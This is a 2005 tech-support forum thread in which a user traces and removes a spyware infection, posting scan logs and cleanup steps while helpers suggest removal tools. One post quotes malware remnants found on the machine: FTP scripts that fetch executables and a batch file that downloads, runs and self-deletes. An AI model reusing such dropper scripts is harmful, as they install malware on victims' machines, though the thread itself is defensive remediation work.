Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


Dxmsrv.exe And Sticky Dll's

  • Please log in to reply
8 replies to this topic

#1 RuedigerPlantiko


  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 09 November 2005 - 04:20 AM

Dear bleepingcomputer team,

on Sunday, November 6, 2005 at 11h20m MET, a program called drsmartload.exe had
been downloaded and executed on my laptop (preceded by some stupid actions of me
that I surely will never repeat... ). I found out that the program had been downloaded
from the following URL


And there it is until today, as I tried out. Maybe this information is helpful if somebody
is willing to analyze the machine code and understand what happens (I can't).

The program loaded several other "fine" ressources on the laptop. Since I was "googling"
at that time, I immediately realized the browser (MSIE) behaviour changed: On any request,
a redirect to commercial website was performed, using a page containing something like
"roboweb" in the URL (it changed quickly, so I didn't get the exact URL). Also, a new
toolbar appeared in the top area with some more fine "Super Search" functions.

I immediately plugged off the laptop and stayed offline. Since then, I tried to get rid
of my new friends.

1.) I found out that for all executed files, Windows XP makes an excerpt in a special folder
called C:\Windows\Prefetch (performance reasons?). This folder was helpful for me as a log:
From the time stamps, I could see which programs had been executed immediately after drsmartload.exe.
Among others, a suspicious file named glb2.tmp had been executed.
I have a complete list and can post it if someone is interested.

2.) The new taskbar was easy to delete, using the IE-menu point for managing toolbars.

3.) I looked in C:\Windows\system32 and found four new DLL's all of about 260 KB size, which had been changed at last restart.

4.) After each restart, these DLL's changed their names or where newly installed from another place,
unknown to me.

5.) I googled with the name of these DLL's from a safe computer and found out that the names of
these DLL's led me to completely different Virus/Trojan definitions. So I assume that the names are
chosen with the purpose to put the user on wrong tracks.

6.) I tried to delete the DLL's manually, which worked for two of them, the other two could not be
deleted, as they were used by another process. I could not find this process in taskmgr.exe,
all the processes listed there appeared harmless to me. The "tasklist" command was not known,
although it belongs to XP as a standard tool. Maybe it has been deleted by the malware from my
computer. Therefore, I could not identify the process ID of the blocking process and could not
kill it.

7.) I tried to get rid of the dll's using the safe mode. No chance, the process was there and blocked
two of them.

8.) Now, finally I became so scared that I looked for some tools out there which could help me. I found
your tutorial "How to remove malware from your computer" and followed the advices.

9.) I downloaded l2mfix and cclean from a safe computer, transferring the executables on the laptop with the aid of a memory stick.

10.) I started cclean, after having made a copy of the C:\Windows\Prefetch dirlist which seemed useful to me. This program cleaned most of the temporary files on the Computer.

11.) I started l2mfix in mode 1 (analysis). Besides the suspicious .dll's in the system32 directory, it also listed 2 files in system32 named dxmsrv.exe and guard.tmp.

12.) guard.tmp was easy to delete. Afterwards, it did not appear in the file list of l2mfix,
however the l2mfix registry list shows that there still is a registry entry for it.

13.) dxmsrv.exe really was the best hint: After restarts, the names of the dll's changed, but the name dxmsrv.exe remained in all further restart/run of l2mfix cycles.

14.) Unfortunately, the file dxmsrv.exe is not displayed in the directory list of C:\Windows\system32, although it should be there, according to the l2mfix report. Of course, I have the flag "show hidden files" checked on. Since it is not shown, I can not delete it. My attempt to delete it with a direct DOS delete call in a MS-DOS command prompt, failed with error "dxmsrv.exe unknown" or so.

15.) I found several web sites referring to dxmsrv.exe as a dangerous spy- and adware ressource hog, the source of which is yet unknown. Well, I know the source (see above)...

16.) I downloaded autorun and analyzed the registered autoruns. Some of the current dll's where registered. I deregistered them with the help auf autorun, in the safe mode. But no effect - after the next restart, the new dll's where registered.

17.) Impatient as I was in the meantime, I tried mode 2 of l2mfix. I wanted to check whether the program is able to delete the file from its own. But I had no success.

18.) The report in mode 1 of l2mfix keeps showing my new fellows: The four or five dll's with varying and probably misleading names, and the dxmsrv.exe

I have no idea what to do now. I need professional help. Can you help me?

Thanks and regards,
Rüdiger Plantiko

P.S.: Here a log of the last l2mfix run this morning:

These are the registry keys present
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wzcnotif]

RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above
Copyright © 1999-2001 Frank Heyne Software (http://www.heysoft.de)
This program is Freeware, use it on your own risk!

Access Control List for Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify:
(CI) DENY --C------- VORDEFINIERT\Administratoren
(ID-NI) ALLOW Full access VORDEFINIERT\Administratoren
(ID-IO) ALLOW Full access VORDEFINIERT\Administratoren

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

Shell Extension key:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00022613-0000-0000-C000-000000000046}"="Eigenschaften fr Multimediadatei"
"{3EA48300-8CF6-101B-84FB-666CCB9BCD32}"="OLE-Eigenschaftenseite fr Dokumente"
"{40dd6e20-7c17-11ce-a804-00aa003ca9f6}"="Shellerweiterungen fr Freigaben"
"{41E300E0-78B6-11ce-849B-444553540000}"="PlusPack CPL Extension"
"{42071712-76d4-11d1-8b24-00a0c9068ff3}"="CPL-Erweiterung fr Grafikkarten"
"{42071713-76d4-11d1-8b24-00a0c9068ff3}"="CPL-Erweiterung fr Bildschirme"
"{42071714-76d4-11d1-8b24-00a0c9068ff3}"="CPL-Erweiterung fr Anzeigeverschiebung"
"{59099400-57FF-11CE-BD94-0020AF85B590}"="Erweiterung fr Datentr„gerkopien"
"{59be4990-f85c-11ce-aff7-00aa003ca9f6}"="Shellerweiterungen fr Microsoft Windows-Netzwerkobjekte"
"{764BF0E1-F219-11ce-972D-00AA00A14F56}"="Shellerweiterungen fr die Dateikomprimierung"
"{77597368-7b15-11d0-a0c2-080036af3f03}"="Shellerweiterung fr Webdrucker"
"{7988B573-EC89-11cf-9C00-00AA00A14F56}"="Disk Quota UI"
"{853FE2B1-B769-11d0-9C4E-00C04FB6C6FA}"="Kontextmen fr die Verschlsselung"
"{88895560-9AA2-1069-930E-00AA0030EBC8}"="Erweiterung fr HyperTerminal-Icons"
"{f81e9010-6ea4-11ce-a7ff-00aa003ca9f6}"="Shellerweiterungen fr Freigaben"
"{f92e8c40-3d33-11d2-b1aa-080036a75b03}"="Display TroubleShoot CPL Extension"
"{E211B736-43FD-11D1-9EFB-0000F8757FCD}"="Scanner und Kameras"
"{FB0C9C8A-6C50-11D1-9F1D-0000F8757FCD}"="Scanner und Kameras"
"{905667aa-acd6-11d2-8080-00805f6596d2}"="Scanner und Kameras"
"{3F953603-1008-4f6e-A73A-04AAC7A992F1}"="Scanner und Kameras"
"{83bbcbf3-b28a-4919-a5aa-73027445d672}"="Scanner und Kameras"
"{F0152790-D56E-4445-850E-4F3117DB740C}"="Remote Sessions CPL Extension"
"{5F327514-6C5E-4d60-8F16-D07FA08A78ED}"="Auto Update Property Sheet Extension"
"{60254CA5-953B-11CF-8C96-00AA00B8708C}"="Shellerweiterungen fr Windows Script Host"
"{2206CDB2-19C1-11D1-89E0-00C04FD7A829}"="Microsoft Datenverknpfung"
"{DD2110F0-9EEF-11cf-8D8E-00AA0060F5BF}"="Tasks Folder Icon Handler"
"{797F1E90-9EDD-11cf-8D8E-00AA0060F5BF}"="Tasks Folder Shell Extension"
"{D6277990-4C6A-11CF-8D87-00AA0060F5BF}"="Geplante Tasks"
"{0DF44EAA-FF21-4412-828E-260A8728E7F1}"="Taskleiste und Startmen"
"{2559a1f1-21d7-11d4-bdaf-00c04f60b9f0}"="Hilfe und Support"
"{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}"="Hilfe und Support"
"{875CB1A1-0F29-45de-A1AE-CFB4950D0B78}"="Audio Media Properties Handler"
"{40C3D757-D6E4-4b49-BB41-0E5BBEA28817}"="Video Media Properties Handler"
"{E4B29F9D-D390-480b-92FD-7DDB47101D71}"="Wav Properties Handler"
"{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"="Avi Properties Handler"
"{A6FD9E45-6E44-43f9-8644-08598F5A74D9}"="Midi Properties Handler"
"{c5a40261-cd64-4ccf-84cb-c394da41d590}"="Video Thumbnail Extractor"
"{5E6AB780-7743-11CF-A12B-00AA004AE837}"="Microsoft Internet Toolbar"
"{22BF0C20-6DA7-11D0-B373-00A0C9034938}"="Download Status"
"{91EA3F8B-C99B-11d0-9815-00C04FD91972}"="Augmented Shell Folder"
"{6413BA2C-B461-11d1-A18A-080036B11A03}"="Augmented Shell Folder 2"
"{7BA4C742-9E81-11CF-99D3-00AA004AE837}"="Microsoft BrowserBand"
"{30D02401-6A81-11d0-8274-00C04FD5AE38}"="Search Band"
"{32683183-48a0-441b-a342-7c2a440a9478}"="Media Band"
"{169A0691-8DF9-11d1-A1C4-00C04FD75D13}"="In-pane search"
"{07798131-AF23-11d1-9111-00A0C98BA67D}"="Web Search"
"{AF4F6510-F982-11d0-8595-00AA004CD6D8}"="Registry Tree Options Utility"
"{A08C11D2-A228-11d0-825B-00AA005B4383}"="Address EditBox"
"{00BB2763-6A77-11D0-A535-00C04FD7D062}"="Microsoft AutoComplete"
"{6756A641-DE71-11d0-831B-00AA005B4383}"="MRU AutoComplete List"
"{6935DB93-21E8-4ccc-BEB9-9FE3C77A297A}"="Custom MRU AutoCompleted List"
"{acf35015-526e-4230-9596-becbe19f0ac9}"="Track Popup Bar"
"{E0E11A09-5CB8-4B6C-8332-E00720A168F2}"="Syntaxanalyse der Adressleiste"
"{00BB2764-6A77-11D0-A535-00C04FD7D062}"="Microsoft History AutoComplete List"
"{03C036F1-A186-11D0-824A-00AA005B4383}"="Microsoft Shell Folder AutoComplete List"
"{00BB2765-6A77-11D0-A535-00C04FD7D062}"="Microsoft Multiple AutoComplete List Container"
"{ECD4FC4E-521C-11D0-B792-00A0C90312E1}"="Shell Band Site Menu"
"{3CCF8A41-5C85-11d0-9796-00AA00B90ADF}"="Shell DeskBarApp"
"{ECD4FC4C-521C-11D0-B792-00A0C90312E1}"="Shell DeskBar"
"{ECD4FC4D-521C-11D0-B792-00A0C90312E1}"="Shell Rebar BandSite"
"{DD313E04-FEFF-11d1-8ECD-0000F87A470C}"="User Assist"
"{EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}"="Global Folder Settings"
"{EFA24E61-B078-11d0-89E4-00C04FC9E26E}"="Favorites Band"
"{0A89A860-D7B1-11CE-8350-444553540000}"="Shell Automation Inproc Service"
"{E7E4BC40-E76A-11CE-A9BB-00AA004AE837}"="Shell DocObject Viewer"
"{A5E46E3A-8849-11D1-9D8C-00C04FC99D61}"="Microsoft Browser Architecture"
"{3C374A40-BAE4-11CF-BF7D-00AA006946EE}"="Microsoft URL-Verlauf-Dienst"
"{7BD29E00-76C1-11CF-9DD0-00A0C9034933}"="Temporary Internet Files"
"{7BD29E01-76C1-11CF-9DD0-00A0C9034933}"="Temporary Internet Files"
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}"="Microsoft Url Sucheingriff"
"{A2B0DD40-CC59-11d0-A3A5-00C04FD706EC}"="IE4 Suite-Begráungsbildschirm"
"{67EA19A0-CCEF-11d0-8024-00C04FD75D13}"="CDF Extension Copy Hook"
"{131A6951-7F78-11D0-A979-00C04FD705A2}"="ISFBand OC"
"{9461b922-3c5a-11d2-bf8b-00c04fb93661}"="Search Assistant OC"
"{871C5380-42A0-1069-A2EA-08002B30309D}"="Internet Name Space"
"{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}"="Sendmail service"
"{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE}"="Sendmail service"
"{ABBE31D0-6DAE-11D0-BECA-00C04FD940BE}"="Subscription Mgr"
"{F5175861-2688-11d0-9C5E-00AA00A45957}"="Subscription Folder"
"{7D559C10-9FE9-11d0-93F7-00AA0059CE02}"="Code Download Agent"
"{7FC0B86E-5FA7-11d1-BC7C-00C04FD929DB}"="WebCheck SyncMgr Handler"
"{352EC2B7-8B9A-11D1-B8AE-006008059382}"="Shell Application Manager"
"{0B124F8F-91F0-11D1-B8B5-006008059382}"="Installed Apps Enumerator"
"{CFCCC7A0-A282-11D1-9082-006008059382}"="Darwin App Publisher"
"{e84fda7c-1d6a-45f6-b725-cb260c236066}"="Shell Image Verbs"
"{66e4e4fb-f385-4dd0-8d74-a2efd1bc6178}"="Shell Image Data Factory"
"{3F30C968-480A-4C6C-862D-EFC0897BB84B}"="GDI+ Dateiminiaturansicht-Extrahierungsprogramm"
"{9DBD2C50-62AD-11d0-B806-00C04FD706EC}"="Zusammenfassungs-Miniaturansichthandler (DOCFILES)"
"{eb9b1153-3b57-4e68-959a-a3266bc3d7fe}"="Shell Image Property Handler"
"{add36aa8-751a-4579-a266-d66f5202ccbb}"="Bestellung von Abzgen ber das Internet"
"{6b33163c-76a5-4b6c-bf21-45de9cd503a1}"="Shellobjekt des Webpublishing-Assistenten"
"{BD472F60-27FA-11cf-B8B4-444553540000}"="Compressed (zipped) Folder Right Drag Handler"
"{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}"="Compressed (zipped) Folder SendTo Target"
"{f3da0dc0-9cc8-11d0-a599-00c04fd64437}"="Channel Menu"
"{f3ea0dc0-9cc8-11d0-a599-00c04fd64438}"="Channel Properties"
"{63da6ec0-2e98-11cf-8d82-444553540000}"="FTP Folders Webview"
"{883373C3-BF89-11D1-BE35-080036B11A03}"="Microsoft DocProp Shell Ext"
"{A9CF0EAE-901A-4739-A481-E35B73E47F6D}"="Microsoft DocProp Inplace Edit Box Control"
"{8EE97210-FD1F-4B19-91DA-67914005F020}"="Microsoft DocProp Inplace ML Edit Box Control"
"{0EEA25CC-4362-4A12-850B-86EE61B0D3EB}"="Microsoft DocProp Inplace Droplist Combo Control"
"{6A205B57-2567-4A2C-B881-F787FAB579A3}"="Microsoft DocProp Inplace Calendar Control"
"{28F8A4AC-BBB3-4D9B-B177-82BFC914FA33}"="Microsoft DocProp Inplace Time Control"
"{8A23E65E-31C2-11d0-891C-00A024AB2DBB}"="Directory Query UI"
"{9E51E0D0-6E0F-11d2-9601-00C04FA31A86}"="Shell properties for a DS object"
"{163FDC20-2ABC-11d0-88F0-00A024AB2DBB}"="Directory Object Find"
"{F020E586-5264-11d1-A532-0000F8757D7E}"="Directory Start/Search Find"
"{0D45D530-764B-11d0-A1CA-00AA00C16E65}"="Directory Property UI"
"{62AE1F9A-126A-11D0-A14B-0800361B1103}"="Directory Context Menu Verbs"
"{ECF03A33-103D-11d2-854D-006008059367}"="MyDocs Copy Hook"
"{ECF03A32-103D-11d2-854D-006008059367}"="MyDocs Drop Target"
"{4a7ded0a-ad25-11d0-98a8-0800361b1103}"="MyDocs Properties"
"{750fdf0e-2a26-11d1-a3ea-080036587f03}"="Offline Files Menu"
"{10CFC467-4392-11d2-8DB4-00C04FA31A66}"="Offline Files Folder Options"
"{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E}"="Ordner 'Offlinedateien'"
"{143A62C8-C33B-11D1-84FE-00C04FA34A14}"="Microsoft Agent Character Property Sheet Handler"
"{7A80E4A8-8005-11D2-BCF8-00C04F72C717}"="MMC Icon Handler"
"{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}"=".CAB file viewer"
"{32714800-2E5F-11d0-8B85-00AA0044F941}"="&Nach Personen..."
"{8DD448E6-C188-4aed-AF92-44956194EB1F}"="Windows Media Player Play as Playlist Context Menu Handler"
"{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}"="Windows Media Player Burn Audio CD Context Menu Handler"
"{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}"="Windows Media Player Add to Playlist Context Menu Handler"
"{1D2680C9-0E2A-469d-B787-065558BC7D43}"="Fusion Cache"
"{00020D75-0000-0000-C000-000000000046}"="Microsoft Office Outlook Desktop Icon Handler"
"{0006F045-0000-0000-C000-000000000046}"="Microsoft Office Outlook Custom Icon Handler"
"{42042206-2D85-11D3-8CFF-005004838597}"="Microsoft Office HTML Icon Handler"
"{EDB0E980-90BD-11D4-8599-0008C7D3B6F8}"="Eudora's Shell Extension"
"{CF74B903-3389-469c-B3B6-0204D204FCBD}"="SnagIt Shell Extension"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\AutorunsDisabled]

Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{08AC2978-5B57-42AF-98AA-D6E19F8E6EA5}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{08AC2978-5B57-42AF-98AA-D6E19F8E6EA5}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{F0893519-6796-4BDD-BC65-8A700A05834A}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{F0893519-6796-4BDD-BC65-8A700A05834A}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{0C5DDB1C-8F52-4371-BB82-BD87D356233B}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{0C5DDB1C-8F52-4371-BB82-BD87D356233B}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{D18D1AEA-4E0B-4A2E-B003-C24BC4F79477}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{D18D1AEA-4E0B-4A2E-B003-C24BC4F79477}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{C7FCCD2B-16D8-4FC5-ADD3-357270C66F75}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{C7FCCD2B-16D8-4FC5-ADD3-357270C66F75}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Files Found are not all bad files:

m6lslg~1.dll Tue 8 Nov 2005 23:36:48 ..S.R 234'044 228.56 K
mufutil.dll Wed 9 Nov 2005 6:46:24 ..S.R 235'331 229.81 K
vfs_ps.dll Tue 8 Nov 2005 23:51:20 ..S.R 235'331 229.81 K

3 items found: 3 files (3 H/S), 0 directories.
Total of file sizes: 704'706 bytes 688.19 K
Locate .tmp files:

No matches found.
Directory Listing of system files:
Datentr„ger in Laufwerk C: ist System
Volumeseriennummer: AC89-BA57

Verzeichnis von C:\WINDOWS\System32

09.11.2005 06:46 235'331 mufutil.dll
08.11.2005 23:51 235'331 vfs_ps.dll
08.11.2005 23:36 234'044 m6lslg3716.dll
11.03.2005 18:00 90'852 dxmsrv.exe
4 Datei(en) 795'558 Bytes
0 Verzeichnis(se), 31'436'910'592 Bytes frei

//Mod edit: Hot link URL above edited to protect others

Edited by KoanYorel, 09 November 2005 - 04:47 AM.

BC AdBot (Login to Remove)


#2 stidyup


  • Members
  • 641 posts
  • Gender:Male
  • Local time:08:22 AM

Posted 09 November 2005 - 08:04 AM

Sophos on drsmartload.exe

If you think you are infected submit a hijackthis log to the HJT Forum.

How to submit a hijackthis log

Download Hijackthis

Try running the following from safe mode (Getting to safe-mode) Sysclean you'll also need the virus template file from here lpt***.zip remember to extract the contents of the zip file into the same folder as Sysclean.com


DrWeb CureIT


KASFX which is powered by the Kaspersky AV engine, you will need internet access to update it. If you haven't got net access in safe mode, update it before you use it.

If your good with the command line also try Sophos Command Line scanner this command will scan all of your hdd's SAV32CLI.EXE -F -di -remove -dn -mbr -all -zip -p=avscanlog.txt and give you a log file to review afterwards.

Also try installing and running A2 Free and Ewido

I'd also run Spybot(Spybot Tutorial) and Adaware

If your using Win2K/XP run adaware/spybot from "safe mode with command prompt"

At the C:\ prompt type the following:-

C:\progra~1\spybot~1\spybotsd.exe /autocheck /autofix

#3 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 09 November 2005 - 09:56 AM

[quote name='stidyup' date='Nov 9 2005, 02:04 PM' post='189690']
Sophos on drsmartload.exe

Hi stidyup,

thanks for your quick reply and for the helpful links. Currently, I am in the office. I have
a safe internet access from a second computer at home, form which i can download the
SW you recommended to me.

Of course, from my post it's pretty clear for me that the laptop is infected. If you are constrained
to the "Hijack This Log" output, I will append the output this evening. I thought, the output of
l2mfix was sufficiently clear already.

My problem is probably not drsmartload.exe, but dxmsrv.exe. It seems that drsmartload.exe
only was the door through which all these black demons entered into the computer. But the really
bad guy is dxmsrv.exe.

I will study him more deeply this evening...

Thanks again, and regards,

#4 stidyup


  • Members
  • 641 posts
  • Gender:Male
  • Local time:08:22 AM

Posted 09 November 2005 - 11:07 AM

If you need to scan a suspect file you can do it at these two sites jotti and Virus Total which use multiple AV scan engines.

#5 tg1911


    Lord Spam Magnet

  • Members
  • 19,274 posts
  • Gender:Male
  • Location:SW Louisiana
  • Local time:07:22 AM

Posted 09 November 2005 - 04:19 PM

I've split off your HJT log from your post here, and moved it to the "HijackThis Logs and Analysis" forum.

Here's a link to your log:
RuedigerPlantiko's HJT log

Please, DO NOT make another post in the HJT forum, until it has been responded to by a member of the HJT Team. The first thing they look for, when looking for logs to reply to, is 0 replies. If you make another post, there will be 1 reply. The team member, glancing over the replies, might assume someone is already helping you out, and will not respond. So, just make your post, and let it sit there, until a team member responds. This way you will be taken care of, in the most timely manner.

Edited by tg1911, 09 November 2005 - 04:21 PM.

MOBO: GIGABYTE GA-MA790X-UD4P, CPU: Phenom II X4 955 Deneb BE, HS/F: CoolerMaster V8, RAM: 2 x 1G Kingston HyperX DDR2 800, VGA: ECS GeForce Black GTX 560, PSU: Antec TruePower Modular 750W, Soundcard: Asus Xonar D1, Case: CoolerMaster COSMOS 1000, Storage: Internal - 2 x Seagate 250GB SATA, 2 x WD 1TB SATA; External - Seagate 500GB USB, WD 640GB eSATA, 3 x WD 1TB eSATA

Become a BleepingComputer fan: Facebook

#6 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 10 November 2005 - 02:59 AM

Here is a report of my yesterday evening actions:
  • Started Registry Toolkit
    It found 268 invalid entries; the free version deleted 51 of them,
    the invalid file extension associations, which have nothing
    to do with my problem.
    In the areas "Custom Controls" and "Deep Registry Scan",
    it found references to invalid DLL's which stem from my
    • guard.tmp
    • oldn.dll
    • bjap.dll
    • agctres.dll
    This was no new information for me.
    I will surely not buy this program, because I don't like
    the UI. Also, it does not generate a plain text log which
    is a disadvantage. (At least I didn't find one).
  • Started sysclean.com (trendmicro)
    I used the latest patterns lpt$vpn.935 and tmaptn.305.
    As you recommended, I started the program in safe mode.
    The program had a runtime of 2.5 hours.
    It found and deleted 12 infected files, but to my knowledge only one
    of them had been executed. The others were email attachments
    mails that I had never opened in my Eudora email client. I
    had deleted the emails since a long time, but I have to check
    why the attachments left over in Eudora's attachment folder.
    The file that had been executed was infected with a piece of
    malware called TROJ_DLOADER.AEJ
After this session it was 0:30 a.m. I was too tired to continue
the fight against dxmsrc.exe. I checked the system32 folder: It
still contained four DLL's changed at that time. They had new
names, again. I started l2mfix again. It kept telling me that there
is a file dxmsrv.exe in the C:\Windows\system32. I still could
neither see nor delete this file, neither in the File Explorer nor by
using the DOS console.

With other words: All my problems have persisted these actions.

Since I don't have time to check all the other nice antivirus programs
out there, I have to focus on the fight against dxmsrv.exe and the
sticky DLL's. Removing the registry entries referring to the DLL's
was of no effect. After the restart, there are new registry entries. My
strategy should therefore be:
  • to identify and kill the process running dxmsrv.exe
    I found out that tasklist.exe is not part of the XP Home distribution. I will
    therefore download the sysinternals tool Process Explorer and
    use it this evening to obtain more information.
  • to identify and delete the file dxmsrv.exe (how does l2mfix find it????)
  • to delete all the suspicious DLL's in the system32 folder.
When this is done, the danger will be banned. The invalid registry entries may be
deleted in a second step. I will continue the fight this evening...

For this plan, I have two strange tasks (help appreciated!!!):
  • How to remove a program that doesn't show up in the dirlists?
    Sound strange, but it is like this. I don't know how this can be made happen.
    But it is like this: l2mfix does find the program, DOS and explorer don't. Is
    this a renaming trick? It sounds incredible to me that a virus manipulates
    the system functions for directory listing, in both DOS console and explorer.
    Are there examples for such masterpieces?
  • How to identify a running process that doesn't show up in TaskMgr?
    I will try sysinternal's process explorer this evening.

P.S.: On castlecop.com, I find the following information:

Name: dxmsrv
Command: dxmsrv.exe
Status: X
Description: Added by an unidentified WORM or TROJAN!

But what does this mean? How can I delete it? A process is a process, from
whereever it was started. When I want to delete the DLL's, I get the message
that some of them are blocked by a another process. I need to find out the
blocking process, so that I can kill it. tasklist.exe is not available, as mentioned.
sysinternal's procexp may help me.

Edited by RuedigerPlantiko, 10 November 2005 - 03:11 AM.

#7 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 10 November 2005 - 05:22 PM

:thumbsup: the fight is won! :flowers:

This night, the third session about the virus, I have won the fight. Special thanks to
sysinternals.com, they have great tools, and to the authors of l2mfix, and of course
to the bleepingcomputer team for giving me valuable suggestions.

I followed the strategy I had planned over the day (outlined above):

To minimize the number of active processes, I worked in safe mode. The system32
folder was populated with an impressive number of DLL's with a last change time of
this week, all about 230 KB big. Most of them could be deleted by hand, except 2
of them. With each new start of the computer, new clones are added in the system32
directory. For information of other victims, I give here a list of these dll names:


I didn't check it, but I guess that they are real clones, i.e. they should contain almost identical code.
The sizes were about 230 KB, differing slightly from one another.

I deleted all of these creatures that were deletable, emptied the tray and remained with two dll's
for which the system announced that they can't be deleted. These were guard.tmp and owe2.dll (but
it is arbitrary, in earlier sessions other dll's were blocked).

I started sysinternals process explorer (procexp) to find out which process blocks it. To my
surprise, there was no hidden process (I expected dxmsrv.exe to show up here), but it were
explorer.exe and rundll32.exe!

I decided to kill eplorer.exe and rundll32.exe which was possible even with the task manager. The start
menu bar etc. disappeared, I remained with the TaskMgr. From there I started (with "New->Task
(execute)")a console, switched to C:\windows\system32 and could easily delete the two last dll's that
were remaining.

I then cleaned up the registry with sysinternal's tool autoruns. I deleted all entries referring to
non-existing files. There were several entries referring to one of the dll's given above.

After this, I generated a new l2mfix scan. The references to suspicious files were reduced to only one
entry: The famous dxmsrv.exe which still is a mystery to me. I couldn't locate it in the
c:\windows\system32 folder, where it should be, according to l2mfix. Later more...

With fingers crossed, I rebooted. Victory! No new dll's were appearing in the system32 folder!!!
This means, the mechanism of the virus to create continuously replica of itself with varying and probably
misleading names, was broken by the operations described here.

But what about dxmsrv.exe? It's still a mystery which is not yet resolved completely. I scanned the
complete C drive for files with this name - nothing. Finally I came to the idea to look at the time stamp
of the entry in the l2mfix protocol. The line was:

11.03.2005 18:00 90.852 dxmsrv.exe

I looked for entries in C:\windows\system32 having this change date. I found several strange
files which obviously contained instructions for getting .exe files by ftp from some source. Example:
File named cmd.ftp with the content:

open 1023
get 30187_upload.exe

This looks like a Microsoft patch download. Or SHOULD it only look like this????

Another one was named .pif, i.e. it had no file name. It contained a similar

open 14024
user a a
GET syswork.exe

There was a similar file o (no extension) to get an executable named wvsvc.exe, and
a batch file c.bat which performed the ftp using the script file .pif and then executed
the downloaded file syswork.exe:

@echo off
ftp -n -v -s:.pif
del .pif
del /F c.bat
exit /y

Furthermore, there were several files with names starting with TFTP and having no extension.
Most of them had size 0. But three of them contained binary information of about 110 KB.

All these files, dated from March 11, 17:38 to 18:07, looked very suspicious to me. I have moved
them in a special folder named sys32_quarant. But l2mfix keeps listing dxmsrv.exe. I
have to look at this further.

I will keep staying plugged off with the laptop until the dxmsrv.exe mystery is solved. But I think,
the steps of today fixed my virus problem.

Good night,

Questions (added 1 day later):
  • Is there anybody out there who has made some experiences with dxmsrv.exe?
  • Where does l2mfix get the information about the existence of dxmsrv.exe - if not from the file system?
Thank you!

Edited by RuedigerPlantiko, 11 November 2005 - 12:04 PM.

#8 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 15 November 2005 - 04:11 AM

:thumbsup: I had placed the smiley too early in my last posting...

Actually, there still is something on the machine which I can't detect any further.

A new file named ultra.dll showed up in C:\windows\system32.
The file shows as empty, however (0 Bytes).

I will keep this log actual with any further information.

My next plans:
  • Start the computer from a boot CD and scan the directory from there for dxmsrv.exe which still
    shows up in l2mfix.
  • Search for a boot virus
  • If nothing else helps: format C: and reinstall Windows XP Home. I have wasted too much time with this bullbleep, already.

#9 RuedigerPlantiko

